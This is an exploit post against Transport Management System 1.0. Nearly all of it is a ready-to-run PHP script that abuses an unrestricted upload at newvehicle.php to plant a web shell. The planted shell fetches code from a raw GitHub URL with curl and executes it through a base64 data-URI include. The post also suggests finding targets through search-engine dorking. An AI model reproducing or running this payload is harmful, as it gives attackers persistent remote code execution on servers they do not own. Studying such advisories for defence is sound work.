    =============================================================================================================================================| # Title     : Transport Management System 1.0 php code injection Vulnerability                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.xyz/download/project/user/2022/202203/kashipara.com_transport-management-syste.zip                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a shell.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 2.php 127.0.0.1/Transport-Management/[+] payload :<?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'submit' => '',        'vehregno' => '3',    'vehchesis' => '00213771818860',    'vehdescription' => 'hacked by indoushka',    'file' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),            'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/newvehicle.php");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/vehicle picture/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Tag

#auth